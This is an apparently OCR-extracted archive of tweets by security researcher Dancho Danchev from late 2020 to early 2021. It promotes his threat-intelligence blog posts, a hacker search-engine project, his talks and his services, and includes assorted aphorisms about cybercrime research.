#ThreatHunting #Threatintel #Threatintelligence Stay tuned! 


*1 
06:15 
Join me now! https://t.co/DVBGztbLsz 


3 - Saturday 


08:47 

RT @TantataSolution: Tracking cyber-criminals from around the world, by the 
professionals who investigate them. #CyberCamp16 #Koo... 

9 - Friday 


03:30 


https://t.co/fnswrm8KWP - Search Engine for Hackers and Security Experts! #security 
#cybercrime #malware #CyberSecurity #CybersecurityAwarenessMonth 
#CyberAttack #CyberSecMonth #Threatintel #Threatintelligence #ThreatHunting 
Stay tuned! 
30 - Friday 


07:37 


New Post - "Exposing Iran-based Hackers and Web Site Defacement Group’s Personal 
Web Sites Portfolio - Direct Technical Collection Download! Grab a Copy Today!" - 
https://t.co/xBtcwuiLOk #security #cybercrime #malware #ThreatIntel Stay tuned! 
November 


11 - Wednesday 


04:31 


New Post - "Exposing Protonmail and Tutanota’s Illicit Abuse by Ransomware Gangs - 
A Compilation of Currently Active Ransomware-Themed Email Addresses" - 
https://t.co/ix1Z4tfvMw CC: @ProtonMail @TutanotaTeam #security #cybercrime 
#malware #Threatintelligence 


*2 
11:14 
Cheers! https://t.co/KssZUoPcnL 


11:15 
Great stuff! https://t.co/Q3IzkLHyoG 


19 - Thursday 


02:18 
If terrorism is a crime then cybercrime is a form of financial terrorism. 

*1 

02:20 

@deadlyembrace6 @ProtonMail @TutanotaTeam Point taken. For the record 
ProtonMail and Tutanota removed all the accounts. Cheers! 

*1 

06:26 

#NowPlaying - Future - Mask Off (Official Music Video) - https://t.co/gT14cAGOaG 
07:05 


Christmas came early! I have a birthday this week and I'll be spending it with my 
folks doing research touching base with folks from the industry and about to start 
selling a unique hardware-based block-chain enabled firewall appliance. Cheers! 


07:06 


Long story short - the unique UTM hardware based firewall appliance lets you protect 
your home and corporate network using IDS/IPS including AV and honeypots and lets 
you earn crypto-currency in the process of detecting a threat. Appreciate that! 
Cheers! 


07:09 


I’ve been also trying to acquire - https://t.co/SSoKe9VBHr where I’ve received a 
proposition to buy the portal and launch a security community on it with no success. 
I’ve then found a way to launch a project on the original - https://t.co/fnswrm8KWP 
Cheers! 


07:10 


The work on - https://t.co/fnswrm8KWP which I undertook a few months ago basically 
consists of the development of a search engine for hackers which is now live and 
works with an additional Dark Web search engine which I'll release later today. 
Cheers! 


07:12 


We have a blog - https://t.co/T3YfdBnuVz forum - https://t.co/vnRCWY08qD including 
a newsletter - https://t.co/Li0AUnWHit Cheers! 


07:14 


The Web site - https://t.co/fnswrm8KWP is one of the World’s most popular Web sites 
for hackers and security experts since 1994 and it’s therefore a privilege and an 
honor to be running a project on the portal. Stay tuned! Cheers! 


07:15 


I’m still managing and running my personal - https://t.co/JTcqOaYgET which for the 
record has already received 5.6M page views since the original launch in December, 
2005 making it one of the security industry’s most popular security publications. 
Cheers! 


07:16 


I’m also running a commercial E-shop for threat intelligence deliverables and 
Technical Collection type of materials - https://t.co/8BKKLYQSBQB which you can check 
out and let me know what do you think. Cheers! 


07:17 


I’ve been also pretty active on Medium - https://t.co/GtWdP1FvOc by publishing a 
variety of articles in a variety of topics and areas which you can also check and let 
me know what do you think and actually follow me. Cheers! 
*1 
07:19 


Remember Koobface which was basically the highlight of my career circa 2008-2013? 
Check out my Keynote at CyberCamp 2016 - https://t.co/q5iTxLwmK1 where I had the 
privilege to receive an invitation to present and stay tuned! Cheers! 

07:20 
#NowPlaying - Ariana Grande - God is a woman (Official Video) - 
https://t.co/vU4taYb6yQ 
07:25 


You can also go through a recent presentations portfolio - https://t.co/nNsXMPrGi0 
and actually invite me to present at your event by approaching me at 
dancho.danchev@hush.com including a recent interview - https://t.co/glQoxvUWSs 
Cheers! 


07:27 


Did you know that in a previous life I was supposed to work with HBGary? - 
https://t.co/SRSiIBRVJOh I can’t wait to see this happen. Stay tuned! Cheers! - CC: 
@Greghoglund 


20 - Friday 


03:53 


@cedricpernet In a separate world I was once the only individual singled out as a 
major threat intelligence and cybercrime research competitor. Cheers! 
https://t.co/a0YeOM1DZ4 


68 


[Image: slide titled "Competitors", listing the identified competitors]

Cyber Defense Agency (CDA) (US) 
Cyber Security Research and Development Center (US) 
Cyveillance (US) 
Dancho Danchev (EU) 
Department of Homeland Security US-CERT (US) 
Ernst & Young (EU) 
EWA Information and Infrastructure Technologies, Inc. (US) 
Fortify (US) 
Global Security Mag (EU) 
iDefense Labs (US) 
JET Intelligent Risk Systems (US) 
Informatica (US) 
IT — Information Sharing and Analysis Center (US) 
iSIGHT Partners (US) 
Lookingglass (US) 
Multi-State Information Sharing Analysis Center (US) 
nCircle (US) 
SecureWorks (US) 
Trend Micro (US) 
United States Cyber Consequence Unit (US) 


03:58 
#NowPlaying - Zyce - Ayahuasca - https://t.co/5IEGGEO5TK 


04:00 


Great stuff! @ProtonMail and @TutanotaTeam removed all the ransomware email 
accounts which I provided here - https://t.co/ix1Z4tfvMw Cheers! #security 
#cybercrime #malware 


*1 


25 - Wednesday 


05:12 


The Inside Story Behind the Life of ex-Bulgarian Hacker Dancho Danchev - 
https://t.co/yowWUS37hM #security #cybercrime #malware #CyberSecurity 
#Threatintel #threatintelligence 


*1 
23:51 


Pre-Orders Accepted! - https://t.co/fnswrm8KWP Drop me a line at 
ddanchev@cryptogroup.net in terms of finding out the currently accepted payment 
options! Happy Holidays! Regards. Dancho. https://t.co/n79S1YjxX6c 
Earn Crypto-Currency for 
catching the bad guys! 


https://fastalavista.box.sk - Pre-Order today! 


December 


1 - Tuesday 


01:43 


#NowPlaying - James Holden feat. Julie Thompson - Nothing (Original Mix) - 
https://t.co/tni0pcbZRV 


14:36 


New Post - "Exposing Emotet’s Modern Infrastructure - A Case Study on Tracking 
Down and Shutting Down Abusive Malware In Direct Cooperation with Abuse 
Departments" - https://t.co/9cfq9oruSc #security #cybercrime #malware 


5 - Saturday 


08:31 


Who wants to obtain private reader access to my - https://t.co/JIcqOaYgET starting as 
of January, 2021? #security #cybercrime #malware 


15 - Tuesday 


10:50 


Exclusive - "How I Got Robbed and Beaten and Illegally Arrested by a Local Troyan 
Gang in Bulgaria?"- https://t.co/ROiI2TGkcyz #security #cybercrime #malware 
#CyberAttack #CyberSecurity #Threatintel #ThreatHunting #Threatintelligence 


18 - Friday 


12:52 


We're online! Grab HexChat - https://t.co/svsi86esJb and join us at 
https://t.co/kxEf1MNiuX Regards. Dancho. #security #cybercrime #malware 
https://t.co/S8sUCrno9s 
12:59 


Who’s online? #security #cybercrime #malware 


19 - Saturday 


09:59 
Amazon Kindle users! Check this out! - https://t.co/Ot8BkKZEgbG #security 
#cybercrime #malware 


<2 *1 
11:53 


@k8em0 I just came across to this "Top 10 Sexy Infosec Geeks of 2009" compilation - 
https://t.co/rRSTFqvaqyyY and it looks like I almost made the list. Check out the 
comment here - https://t.co/evfs4iGkeb Regards. Dancho. 


*1 


21 - Monday 


09:24 


#NowPlaying - Ariana Grande - Santa Tell Me - https://t.co/FeveYVA11h Happy 
Holidays! God bless and let’s don’t forget about the rest! Cheers! Dancho 


09:31 


This is me presenting at RSA Europe 2012 on Cyber Jihad vs Cyberterrorism - 
Separating Hype from Reality. Here’s the PPT - https://t.co/h4jSOVOgHB Cheers! 
Dancho https://t.co/4hnHmOHEh] 


09:34 


Awesome! Grab a copy of my original Iran’s Hacking Ecosystem exposed report circa 
2015 from here - https://t.co/N8Onckjg5V and the second version of the research 
from here - https://t.co/x6UATSRiIC9 Stay tuned! https://t.co/VYcK8UCcYb} 


*1 
09:36 
Remember Koobface? - https://t.co/oPmvq5vgpxX This is how it all began. Check out 
my Keynote presentation at CyberCamp 2016 here - https://t.co/q5iTxLwmK1 Stay 
tuned! https://t.co/axXLFmWOv6E 


me: +792199101900 


25 - Friday 


11:11 
Ho Ho Ho! Merry Christmas folks! God bless and let’s don’t forget to nuke the rest. I 
mean with high quality research and analysis. Keep up the good work and the spirit! 
Happy Christmas and New Year celebration. Stay tuned! https://t.co/u68KHRhBNI 


*1 


11:17 
@adamjodonnell Merry Christmas! - https://t.co/FeveYVA11h Cheers! Dancho. 


28 - Monday 


05:14 


Got time? Watch my Keynote at CyberCamp 2016 - https://t.co/q5iTxLwmK1 Cheers! 
Dancho 
05:42 


Awesome! Check out this publication! - https://t.co/xMYaljchLC it’s a pleasure and an 
honor to have made the list of IOCs providers. Consider catching up in terms of what 
I’ve been up to at my personal blog - https://t.co/wEK5XX2J9Z Cheers! Dancho 
https://t.co/E8smulfMgp 


*2 
Blog             % of covered IOCs   % of covered iocterms   % of timely IOCs   % of robust IOCs 
Dancho Danchev   42%                 62%                     14%                84% 
Naked Security   43%                 55%                     54%                45% 
THN              38%                 38%                     41%                51% 
Webroot          54%                 719%                    13%                84% 
ThreatPost       26%                 37%                     52%                29% 
TaoSecurity      57%                 61%                     31%                68% 
Sucuri           34%                 35%                     43%                52% 
PaloAlto         39%                 44%                     15%                87% 
Malwarebytes     32%                 48%                     26%                72% 
Hexacorn         49%                 57%                     59%                76% 


715 
2021 


January 


1 - Friday 


04:27 


Grab a copy today! - https://t.co/eVsxfo6tWx #security #cybercrime #malware Stay 
tuned! https://t.co/uunf8Sm93E 
Webroot Inc. 


DANCHO DANCHEV’S 
SECURITY RESEARCH 
FOR WEBROOT INC. 


In-Depth Overview and Analysis 
of Security Blogger Dancho 
Danchev's Security Research for 
Webroot Inc. Circa 2012-2014 


04:28 


Check this out! Grab a copy today! - https://t.co/JXEO67Ucqw #security #cybercrime 
#malware Stay tuned! https://t.co/mkocjLA4Kk 
2 - Saturday 


03:20 


“AN IN-DEPTH ANALYSIS OF HUNDREDS OF HIGH-PROFILE AND 

NEVER-PUBLISHED BEFORE SECURITY RESEARCH ARTICLES AND 

OSINT ANALYSIS BY THE WINNER OF JESSY H. NEAL AWARD FOR 

BEST BLOG FOR ZDNET'S ZERO DAY BLOG FOR 2010." - DANCHO 
DANCHEV 


DANCHO DANCHEV'S 
SECURITY RESEARCH 
PORTFOLIO FOR 


ZDNET'S ZERO DAY 
BLOG 


IN-DEPTH OVERVIEW AND ANALYSIS OF 
SECURITY BLOGGER DANCHO 
DANCHEV'S SECURITY RESEARCH FOR 
ZDNET'S ZERO DAY BLOG CIRCA 2008- 
2012 


BY DANCHO DANCHEV 


Who wants to join me on IRC? Grab a copy of https://t.co/I7DqVpdnXX and join me at 


*1 
08:49 


https://t.co/kxEf1MNiuX Stay tuned! Regards. Dancho 


I’m looking for a VR application developer. Who can assist here? Regards. Dancho 


*%2 
6 - Wednesday 


12:54 


New Post - Exposing the Pay Per Install Underground Business Model - Historical 
OSINT - An Analysis - 2008 - https://t.co/E9qxtvqHXi #security #cybercrime 
#malware 


21 %1 


8 - Friday 


02:45 


Guess who's popular? Original source here - https://t.co/tzX8ADaTld #security 
#cybercrime #malware https://t.co/2IINX3eJyh 


*1 




04:37 


This is me on Google Trends - https://t.co/DpYX6XgCIX Stay tuned! 
https://t.co/FwsS2C62qF 
[Screenshot: Google Trends (trends.google.com), search term "Dancho Danchev", Worldwide, 2004 - present; panels: Interest over time, Interest by region] 


9 - Saturday 


04:13 


Folks check out my historical OSINT analysis of the pay per install market segment 
within the cybercrime ecosystem circa 2008 - https://t.co/E9qxtvqHXi Want to know 
who’s behind BakaSoftware? Check this out - https://t.co/yCfYp9r4VK 
https://t.co/coAmeWOSnE 
13:34 


Hey @mikko check this out! I just came across to this reference that the C&C 
server domain is registered using my name. Takes you back doesn’t it? Here’s the 
PPT - https://t.co/wMxlQCelSZ Cheers and thanks for the reference! Regards. Dancho 
https://t.co/j2NcCspnSz 


10 - Sunday 
09:37 


Just did this! - https://t.co/J6eVOm1pmU Approach me at dancho.danchev@hush.com 


Cheers! Dancho. 
13:51 
Who wants to advertise? https://t.co/NE3YImt6nN 


[Chart: "Dancho Danchev's Blog - Mind Streams of Information Security Knowledge", Views, Jan 2011 - Jan 2019] 


13 - Wednesday 


02:29 
Anyone using Silent Circle? 


*1 
05:25 


RT @netresec: Our #SUNBURST STAGE2 Victim Table (orgs actively targeted by the 
threat actor) has now been updated to include "paloaltonetwo... 


21 - Thursday 
07:57 

Anyone interested in inviting me to speak at their event? 
28 - Thursday 


09:36 


Anyone hiring? #security #cybercrime #malware #CyberSecurity #CyberAttack 
#Threatintelligence #Threatintel 


*1 
10:05 
This is me quoted in an article on the SUNBURST malware campaign - 
https://t.co/sTCEgEfm6a #security #cybercrime #malware 
February 
5 - Friday 
13:02 
New Post - Dancho Danchev’s Blog - Accepting Conference Invitations! - 
https://t.co/mam7hjU6PQ #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintelligence #Threatintel 
21 *%1 
13:03 


New Post - Rogue "Malware Spreading Security Researchers" Launch Malicious Social 
Engineering Campaign Against Legitimate Researchers - OSINT Analysis - 
https://t.co/XTwEOeJdFr #security #cybercrime #malware #CyberSecurity 

#cyberattacks 


*1 
13:04 


New Post - Can You Recognize These Guys? - https://t.co/x9kaXTLkTW #security 
#cybercrime #malware #CyberSecurity #cyberattacks #Threatintelligence 
#Threatintel 


21 %1 
13:05 


New Post - FBI Shuts Down Radical Propaganda Online Web Sites - An OSINT Analysis - 
https://t.co/QqD6PDEyCb #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintel #ThreatIntelligence 


13:06 


New Post - Revisiting “Malware - Future Trends” - 10 Years Later - An Exclusive Peek 
Inside the Modern Cybercrime and Malware Ecosystem - An Analysis - 
https://t.co/wRUOhvs5m6 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintel 


22 *2 
13:07 


New Post - Exclusive Interview with https://t.co/K2zZ28aSWfB’s Primary Project 
Operator - Security Researcher - Dancho Danchev - https://t.co/RellUMZ2rB 
#security #cybercrime #malware #CyberSecurity #cyberattacks #Threatintel 
#Threatintelligence 


<1 *l 
13:08 


New Post - Introducing https://t.co/X2z28aSWfB’s - “How to Get in Touch with the KGB 
- The Definite Hacker’s Manual” Online Manual - https://t.co/OMiphwumQ] #security 
#cybercrime #malware #CyberSecurity #cyberattacks #Threatintel 
#Threatintelligence 


13:19 
New layout - https://t.co/fnswrm8KWP 
13:22 
@threatresearch You're welcome. Stay tuned! 
*1 
13:32 


@viralpoetry @hackermaderas @securitytrails @dragosr @TheRealSmuggler I’m 
alive and kicking. The best is yet to come. God bless and let’s don’t forget about the 
rest. Catch up here - https://t.co/JTcqOaYgET and https://t.co/fnswrm8KWP Cheers! 


Dancho 
*1 
13:36 
RT @packet_storm: Dancho Danchev Launches New Uncle George Initiative 
https://t.co/V76QMHkKXkH #news 
13:38 


RT @CybercampEs: Are you going to miss the keynotes by Dancho Danchev and 
@jaimeblascob at #CyberCamp16? Don't let this opportunity pass https://t... 
6 - Saturday 


02:17 


I have an upcoming first issue of - https://t.co/fnswrm8KWP’s "Wisdom Kings" E-Zine. 
Who wants to contribute with an interview or an article? 


el 
02:20 
In the first issue all articles are contributed by me and I’m currently looking for 


contributors in the form of an interview or an article. Who’s interested? 
https://t.co/mFuYy9y92d 
+-+-+-+ Wisdom Kings Magazine Issue One - “Existence is Futile, Relevance Is Non-Existent” +-+-+-+ 

[Image: table of contents; the entries that survived extraction legibly are listed] 

03. The basics of Social engineering, by Phenomix 
04. How to make anarchy for beginners, by Phenomix 
06. The ultimate guide to getting a girlfriend, by Phenomix 
07. Exploiting the scene for fun and profit, by Phenomix 
08. Hacking your school for fun and profit, by Phenomix 
09. Exposing the “Data Leaks” Paradise, by Phenomix 
10. How not to get “Caught”, by Phenomix 
11. CYBERINT and Virtual SIGINT Exposed, by Phenomix 
12. From Cybercrime to Multi-Billion Dollar Industry, by Phenomix 
13. The “Dark web” Exposed and Profiled, by Phenomix 
14. Exposing the Bastards who stole the Scene, by Phenomix 
15. Top 20 Hacking Sites and Hacking Forums, by Phenomix 
16. Greetz and Shouts go out to, by Phenomix 
17. Conclusion, by Phenomix 
05:59 
Anyone looking to hire Security Blogger? 
10:26 
Who wants to advertise? https://t.co/980i15fNHS 
10:34 


Check this out! "The Inside Story Behind the Life of ex-Bulgarian Hacker Dancho 
Danchev" - https://t.co/kyl5GvScSi 


10:40 
Do you read my blog? Here’s the Amazon Kindle version - https://t.co/JT676NfPZI 


11:23 
Check out this interview with me - https://t.co/G1MgRZBOVG 


11:27 
Listen to this interview with me - https://t.co/WeXBlboxrA 
11:30 
Guess who made the list - https://t.co/YSzc3xM1fl check out the comments! 


7 - Sunday 


09:16 
https://t.co/cTtpAbqDQF 


09:24 


" Accomplished ZDNet blogger Dancho Danchev is an independent security 
consultant, while Kevin Poulsen, senior editor at Wired News, was already widely 
known as a hacker before he made the jump." - https://t.co/QjuqFTKHB 7 


21*1 
09:29 


"But where the hell is Kim Zetter? Kevin Poulsen? Dancho Danchev? Arik Hessidahl? 
Hell I would even put Space Rogue on this list, who is not even a reporter just a 
security media critic." - https://t.co/ZOfStzfscE 


09:34 


"Authentic hardworking online investigators like the ShadowServer Foundation, Jart 
Armin of Host Exploit, Brian Krebs, Dancho Danchev, the Project Grey 
Goose volunteers" - https://t.co/DoZYWHUuma 


09:37 
https://t.co/tzX8ADaTld 


09:46 
Be the best. Nuke the rest. Cheers! Dancho https://t.co/CIhgFZfU7p 
09:46 


https://t.co/SSoKe9VBHr https://t.co/INbIAEbDRmT 
09:47 


I’m back! https://t.co/n1ILz45FFh 
09:47 
In the news! https://t.co/jFresSI3jz 


HNNCast052110 


90 


09:47 


Cheers to my Canadian fan club! https://t.co/9ZVhplgOp} 


*1 
8 - Monday 
06:50 


Anyone looking to hire security blogger technical content writer freelance journalist 
or a reporter? #security #cybercrime #malware #CyberSecurity #cyberattack 


9 - Tuesday 


05:52 
Who's using https://t.co/V6éqUsROUXxR? 
14:10 


My official XMPP Jabber OMEMO ID for real-time communication is 
ddanchev@conversations.im drop me a message today! #security #cybercrime 
#malware #OSINT #Threatintel #infosec #cybersecurity 


*1 
La 7 


https://t.co/UZ6qVANXVF 


10 - Wednesday 


11:52 
xmpp:https://t.co/c6QFWt4vzP.sk@conference.conversations.im?join 


12:05 


I need a cyber security investor to help work with me for an upcoming project. Who's 
interested? #security #cybercrime #malware #CyberAttack #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel 


12 - Friday 
19:19 
https://t.co/fnswrm8KWP 


*1 
19:19 


https://t.co/O6SeAzk1Gw 


19:20 
https://t.co/6dqoX6A0gM 


14 - Sunday 


12:35 
Who can donate? https://t.co/alPU4MOL4P 


17 - Wednesday 


09:57 
Conference photos! https://t.co/[AF4ADAQqD8 


1x1 
09:58 
Conference photos! Part Two. https://t.co/5Vpw9r6t4Q 


11:22 


Trying to get more followers! RT pls! #security #cybercrime #malware 
#CyberSecurity #CyberAttack #CyberSecurityNews #cyberattacks #CyberSec 
#ThreatHunting #Threatintel 


18 - Thursday 


09:51 
Expecting a call from an investor! Wish me luck. https://t.co/vpTj8PrkKkv 
12:44 


New Post - "Exposing Anonymous International’s Hacking Collective Online 
Infrastructure - An OSINT Analysis" - https://t.co/K5nLakKe9hD #security #cybercrime 
#malware 


21 %1 


21 - Sunday 


09:46 


My RSS feed - https://t.co/B6SPnTw7FO Rocking the boat as it’s been 2005! Add me 
to your RSS reader today! Stay tuned! https://t.co/gc07DavvOs 


*1 
MIND STREAMS OF 
INFORMATION SECURITY 
KNOWLEDGE 


In the overwhelming sea of information, access to timely, insightful and independent open 
source intelligence (OSINT) analyses is crucial for maintaining the necessary situational 
awareness to stay on the top of emerging security threats. This blog covers trends and fads, 
tactics and strategies, intersecting with third-party research, speculations and real-time 
CYBERINT assessments, all packed with sarcastic attitude 


Exposing a Currently Active List of Cyber 
Jihad Themed Twitter Accounts - An OSINT 
Analysis 


22 - Monday 


09:16 


Got BitCoin? Check this out - https://t.co/DjegobOF3Wx #security #cybercrime 
#malware #CyberAttack #CyberSecurity #ThreatIntel 


25 - Thursday 
09:30 


Folks! I produced this today. Time to set them straight! - https://t.co/s6FMAh4BVN 
#security #cybercrime #malware #CyberSecurity #Threatintel #Threatintelligence 
https://t.co/rgcO7Qplof 


21 *%1 

09:31 
This is the last of the graphs. Drop me a line at dancho.danchev@hush.com in case 


you're interested in participating in my currently ongoing Law Enforcement and 
OSINT Operation called "Uncle George". Cheers! Dancho https://t.co/tHI7 9vcCAx 


*1 
[Chart: "Distribution of keywords (Frequency)"] 
27 - Saturday 


00:07 


New Post - "Exposing FBI’s Most Wanted Cybercriminals - Omid Ghaffarinia a.k.a 
"Plus" - An OSINT Analysis" - https://t.co/HjCGW7Xmzf #security #cybercrime 
#malware #Threatintel #ThreatHunting 


00:09 


Folks! Big News! We now have a fully working Dark Web search engine featured on 
the front page at - https://t.co/fnswrm8KWP including a new layout! Stay tuned! 
https://t.co/GUPwPeOEMO 


21 %1 


22:10 


New Post - "Dancho Danchev’s Disappearance - 2010 - Official Complaint Against 
Republic of Bulgaria - Part Two" - https://t.co/q2ZS4lscnW #security #cybercrime 
#malware #CyberAttack #CyberSec #ThreatHunting #Threatintel 


28 - Sunday 


08:36 


New Post - "Dancho Danchev’s Law Enforcement and OSINT Operation "Uncle 
George" - An Update" https://t.co/JEZdAxmw07 #security #cybercrime #malware 
#CyberAttack #CyberSecurity #Threatintel 


24 %1 


March 


2 - Tuesday 


07:18 


Folks! Check out our flagship search engine for hackers and security experts on the 
front page at https://t.co/fnswrm8KWP where I’m currently running a high profile 
project including a fully working flagship Dark Web search engine. Stay tuned! 


21 *3 
a7 


07:28 


@TierSigma You’re most welcome! Keep up the good work and the feedback coming. 
Stay tuned! 


*1 


6 - Saturday 


07:33 


New Post - Exposing a Currently Active Portfolio of High-Profile Cybercriminal Email 
Addresses - Part Four - https://t.co/wQIlqKtsxbO #security #cybercrime #malware 
#CyberAttack #cyberattacks #Threatintel 


07:36 


New Post - "Exposing GRU’s Involvement in U.S Election Interference - 2016 - An 
OSINT Analysis" - https://t.co/XpRrj62SHA #security #cybercrime #malware 
#CyberAttack #cyberattacks #Threatintel 
9 - Tuesday 


05:12 


New Post - "Exposing a Currently Active Portfolio of High-Profile Cybercriminal Email 
Addresses - Part Five" - https://t.co/XGk6pbXaf2 #security #cybercrime #malware 
#CyberSecurity #CyberAttack #cyberattacks #ThreatHunting #Threatintel 


21 *%1 
05:13 
New Post - "Exposing a Currently Active Portfolio of High-Profile Cybercriminal Email 


Addresses - Part Six" - https://t.co/5XKRSDTXxQ #security #cybercrime #malware 
#CyberSecurity #CyberAttack #cyberattacks #ThreatHunting #Threatintel 


22 *%1 
05:18 
New Post - "Exposing a Currently Active Portfolio of High-Profile Cybercriminal Email 


Addresses - Part Seven" - https://t.co/uwogqAB3jdh #security #cybercrime #malware 
#CyberSecurity #CyberAttack #cyberattacks #ThreatHunting #Threatintel 


21 *1 
05:39 

@CYBERCOM_DIRNSA @US_CYBERCOM @NSAGov @gillibrandny @SenBobCasey 
Keep up the good work going! If it takes a FOIA request to show them how it’s done I 
would be checking the FOIA section every day - https://t.co/S9xqgwPm7q I recently 
did this article which might be informative - https://t.co/ixQXrZtuZm 


08:39 


@zackwhittaker Supply chain malware attacks are nothing new and should be 
considered dangerous. Check out this analysis here - https://t.co/O3tnrwQbK7 


08:48 


@Treadstone71LLC @CityAM Crypto @Maylrmamay14 @CERAP Paris Jeff. Check this 
out - https://t.co/fRObK11tuUD ; https://t.co/p6siiRueVF ; https://t.co/iT9PtWbYvb ; 
https://t.co/9ncE73Xmé8f ; https://t.co/zeOrVIYvRA ; https://t.co/OeHLX9PkKOU ; 
https://t.co/uFPivg5tDg ; https://t.co/oS7kfZDojF ; https://t.co/z53voQWOWR 


10:21 
I’m back on Twitter! Stay tuned! RT pls! #security #cybercrime #malware 
#CyberSecurity #CyberAttack #ThreatHunting #ThreatIntelligence 
10:22 
The beauty of HD streaming over 3G, ah all the pixels, and how about the audience? 
Magnificent! +disseminated to all the right parties. #WTF 
10:23 


I’m proud to have been part of a team which constructively sets 
people/companies/products straight. Yeah, it’s so @ZDNet I’m talking about! 
#security #cybercrime #malware #CyberSecurity #CyberAttack #ThreatHunting 
#Threatintelligence 


22 *%1 
10:26 
Here’s a quick compilation which is Amazon Kindle compatible. This is basically all of 
my articles which I did for @ZDNet for a period of 4 years - https://t.co/JKEO67Ucqw 
Enjoy and stay tuned! 
10:27 


My experience with Team @Webroot? I can’t wait to meet all the folks with which I 
attended InfoSec 2012 in London. Remember my research back then? Grab a copy 
here - https://t.co/eVsxfo6tWx Cheers and stay tuned! 

10:28 


You see what I want you to see, you hear what I want you to hear, you do what I know 
you would do. Your entire existence is therefore a reflection of my desires. #OPSEC 
#SIGINT #OSINT #security #cybercrime #malware 
10:30


You killed the kid, now try to enjoy the adult. Who by the way happens to be one fine 
piece of work! :-) Check out the related posts here - https://t.co/q2ZS4|lscnw 


99 


10:31 


Beware the power of the rejected, uneducated, and socially insignificant waitress. 
#WTF 


10:31 
The old farts VS Generation | cybercrime fighters warfare, is currently taking place 
everywhere. Let the true professionals win! #security #cybercrime #malware 
10:31 


The day LE starts chasing down legitimate researchers, is the day when LE officially
has no clue where the real criminals are. #BUSYness #security #cybercrime
#malware

10:32 

How do you fight hypocrisy and envy? With professionalism. #security #cybercrime 
#malware 

10:33 


Throughout my modest life experience, I came to the conclusion that bureaucrats
exercising pseudo-executive power. #WTF
10:33 


When you talk and nobody listens, something’s conveniently wrong with everyone’s 
ears. #daily #dose #of #wisdom #security #cybercrime #malware 


10:34 


I’m sorry but I can’t say I’m sorry for being young, talented, legitimate and single.
Why? Cause it feels good! #security #cybercrime #malware 


10:34 
Sometimes, 90% of a LE case is solved, by simply asking. #security #cybercrime 
#malware 
10:34 


The more you like me, the more irrelevant I become. The more you hate me, the
important I become. #security #cybercrime #malware


10:35 


The reason why I possess high value postal stamp collections is fairly simple - you
always lose what you don’t respect. #security #cybercrime #malware 


10:35 
Don’t you get it? I’m the whole idea. #security #cybercrime #malware 


10:36 
I’ve lived to see it - a washing machine technician schooling the cybercrime expert. It 
will be the other way around the next time. #security #cybercrime #malware


10:36 
Everyone wants a piece of me these days. #security #cybercrime #malware 


10:37 
Is it just me, or I’m most productive when I’m most pissed off? #security 
#cybercrime #malware 
10:37 


There’s a special kind of people who patiently wait for research to accumulate, then
take credit for acting upon it, excluding the original sources. Sad. #security 
#cybercrime #malware 


10:37 
Self-serving pseudo-anonymous quote of the day: "Just because I’m beautiful, 
doesn’t necessarily mean that I’m stupid too." #security #cybercrime #malware 




10:39 


If you believe that you need to become a cybercriminal in order to catch a 
cybercriminal, you’re an OSINT/CYBERINT amateur. #security #cybercrime #malware 


21 
10:39 
Treating the disease (malware infection) is far more profitable than curing it (jail,
securing the masses etc.). #security #cybercrime #malware 
10:40 


The day you’re able to gather all this without interacting with the person in question, 
is the day when you can officially call yourself a pro. #security #cybercrime 
#malware 


10:40 

Since everyone knows how to contact "them", why hasn’t anyone done such type of 
interview? Bad taste. #security #cybercrime #malware 

10:42 


What happens when a security researcher starts suffering from the Stockholm 
syndrome, by having a favorable stance against cybercrime? Check out the related
posts here - https://t.co/q2ZS4|lscnW #security #cybercrime #malware 


21 
10:43 
I’m so proud of my coverage on Chinese censorship since 2006 - I’m reading, and I’m
smiling. Check out the posts here - https://t.co/cQYnTrQ0Eq #security #cybercrime
#malware


10:44 


The only way to work with someone you don’t like is by realizing the seriousness of 
the job you’re doing. #security #cybercrime #malware 


10:44 
You shall obfuscate, I shall deobfuscate. #security #cybercrime #malware


10:45 


But every decent researcher knows that nobody is "building" botnets anymore. 
They’re "generating" them. #security #cybercrime #malware 


10:46 


I know who you got paid to DDoS last summer. Check out the post here -
https://t.co/UArb40KSyo #security #cybercrime #malware 


10:46 


Connecting a DDoS for hire service with a government-sponsored attack is like 
connecting a hooker with...well you get the point. #security #cybercrime #malware 


10:47 
No cybercriminal starts from scratch in 2021. It takes a modest $500 investment to 
purchase 1k infected host. #security #cybercrime #malware 
21 
10:49 
The drug addict - the single more irrelevant cosmic phenomena known to the vast 
universe. #offtopic #security #cybercrime #malware 
21 
10:50 
The true OSINT analyst would expose everything without interacting with the people 
in question. #security #cybercrime #malware 
2 
10:51 


Define hypocrisy? Don’t disrupt the cybercrime infrastructure which I originally
profiled based on my initial research. #security #cybercrime #malware 


10:52 


The reason why I don’t engage in OS security flame wars is simple - there are no
insecure OSs, they are insecurely configured OSs. #security #cybercrime #malware 


10:52 
Thought of the day: The more they hate you, the more important you are. Then 
again, life is not a fashion show. So keep walking. #security #cybercrime #malware


10:53 
There’s no such thing as bad publicity, except your own obituary. #security 
#cybercrime #malware 
10:53 
Feed the masses, eat with the classes #WTF 


10:54 


This is a "with all due respect tweet". Researchers ruining important threat intell 
sources for the sake of their page views are bad researchers. #security #cybercrime 
#malware 


10:54 


Brand it, rebrand it, or co-brand it, the advanced persistent threat is cybercrime as 
usual, with no significant impact on your daily operations. #security #cybercrime 
#malware 


10:55 
Having worked/studied with RU and CN folks, for RU I know they don’t like being told
what to do. For CN they either like you or they don’t. #offtopic #security
#cybercrime #malware


10:55 


Everyone’s writing books about cyber warfare these days. That’s the problem. 
#security #cybercrime #malware 


10 - Wednesday 


03:38 


New Post - "Exposing the Modern Money Mule Recruitment Ecosystem - An In-Depth 
OSINT Analysis" https://t.co/LOotM4Gcup #security #cybercrime #malware 
#CyberSecurity #CyberAttack #Threatintel #ThreatHunting #Threatintelligence 


26 *3 
22:42 
Folks! Check this out! Cybercrime Forum Data Set for 2019 - https://t.co/TvkrzdPYPT
#security #cybercrime #malware #CyberSecurity #cyberattacks #CyberSec
#CyberSecurityAwareness #Threatintel #Threatintelligence Enjoy!


11 - Thursday 


06:18 
https://t.co/eVsxfo6tWx https://t.co/IFengcU8KA 


Webroot Inc. 


DANCHO DANCHEV’S 
SECURITY RESEARCH 
FOR WEBROOT INC. 


In-Depth Overview and Analysis 
of Security Blogger Dancho 
Danchev's Security Research for 
Webroot Inc. Circa 2012-2014 

